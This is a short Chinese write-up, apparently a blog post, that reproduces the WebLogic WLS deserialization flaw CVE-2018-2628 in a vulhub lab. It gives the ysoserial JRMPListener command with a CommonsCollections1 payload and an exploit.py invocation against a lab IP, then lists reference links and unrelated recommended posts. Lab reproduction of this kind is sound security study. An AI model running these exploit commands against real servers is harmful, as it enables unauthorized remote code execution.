【vulhub】Weblogic WLS Core Components 反序列化命令执行漏洞(CVE-2018-2628)

简单来说就是先用序列化工具ysoserial启动一个JRMP服务,加载先相关漏洞利用链,加载你要执行的恶意代码。

并将上述结果通过序列化工具ysoserial将我们的恶意代码进行一个序列化操作。

第二步就是将我们的exp去加载ysoserial序列化后的数据,后去打有漏洞的服务。

这个有反序列化漏洞的服务,会去反序列化后,执行我们的恶意代码。

关于cve-2018-2628 楼主测试到这4条cc链都可以打成功cc1 cc6 cc7 cc9

第一步,起一个JRMP服务

bash 复制代码
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 'touch /tmp/akemi'

第二步,漏洞的相关exp去加载JRMP相关的一个序列化恶意代码

bash 复制代码
python exploit.py 192.168.100.34 7001 ysoserial.jar 192.168.100.34 1099 JRMPClient

参考链接

Vulnhub-Weblogic WLS Core Components 反序列化命令执行漏洞(CVE-2018-2628)
weblogic-JAVA反序列化(CVE-2018-2628)
Weblogic CVE-2020-2551漏洞复现&CS实战利用
从0学习WebLogic CVE-2020-2551漏洞
CVE-2018-2628漏洞复现(基于vulhub非常详细!)
runtime函数问题编码
vulhub镜像问题拉取问题

基于ysoserial的深度利用研究(命令回显与内存马)

Beacon Tower Lab记一次反序列化漏洞的利用之路

相关推荐
码兄科技14 小时前
Java AI智能体开发实战:从零构建智能对话系统指南
java·开发语言·人工智能
折哥的程序人生 · 物流技术专研14 小时前
第8篇:六大设计原则在工厂模式中的体现
java·设计模式·设计原则·工厂模式·编程进阶·扩充系列
小明bishe1815 小时前
计算机毕业设计之基于JAVA的植物科普网站
java·spring boot·spring·架构·课程设计
r_oo_ki_e_15 小时前
Java Map 集合学习笔记
java·笔记·学习
SL-staff15 小时前
智慧园区2000+设备统一管理:JVS-IoT如何降低运维成本40%
java·开发语言·物联网·智慧园区·设备管理·运维优化·jvs-iot
咖啡八杯16 小时前
GoF设计模式——模板方法模式
java·后端·spring·设计模式
爱笑的源码基地17 小时前
一款全开源的信创云PACS影像云平台解决方案,支持多模态医学影像处理(CT/MR/DR/超声/病理等)
java·源码·国产化·pacs·云影像·区域pacs
我命由我1234517 小时前
Android 开发问题:ClickableSpan 的点击事件没有生效
java·java-ee·android studio·android jetpack·android-studio·android runtime
万亿少女的梦16817 小时前
基于Python的高考志愿填报辅助系统设计与实现
java·spring boot·python·mysql·vue
微信开发api-视频号协议17 小时前
企业微信外部群开发自动化实践过程
java·前端·微信·自动化·企业微信·ipad